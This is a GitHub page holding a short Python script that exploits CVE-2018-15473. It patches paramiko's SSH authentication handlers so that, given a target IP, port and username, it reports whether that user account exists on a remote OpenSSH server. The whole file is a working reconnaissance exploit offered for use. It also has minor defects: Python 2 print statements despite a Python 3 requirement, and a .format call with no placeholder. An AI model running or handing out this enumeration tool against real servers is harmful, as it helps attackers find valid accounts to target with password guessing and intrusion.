-
Notifications
You must be signed in to change notification settings - Fork 1
/
usuariossh.py
63 lines (47 loc) · 2.08 KB
/
usuariossh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/env python
# Descubre en remoto usuario existente valido SSH
# Requiere tener instalado Python3
# sudo apt-get install python-is-python3
# CVE-2018-15473 SSH User Enumeration by hackingyseguridad.com (@hackyseguridad) https://hackingyseguridad.com.github.io
import argparse, logging, paramiko, socket, sys, os, warnings
if not sys.warnoptions:
warnings.simplefilter("ignore")
class InvalidUsername(Exception):
pass
def add_boolean(*args, **kwargs):
pass
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)
def invalid_username(*args, **kwargs):
raise InvalidUsername()
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
def check_user(username):
sock = socket.socket()
sock.connect((args.target, int(args.port)))
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[!] Failed to negotiate SSH transport'
sys.exit(2)
try:
transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print ""
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print "" + args.target + ":" + args.port + " Existe este usuario !!!".format(username)
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
parser = argparse.ArgumentParser(description='SSH User Enumeration')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
check_user(args.username)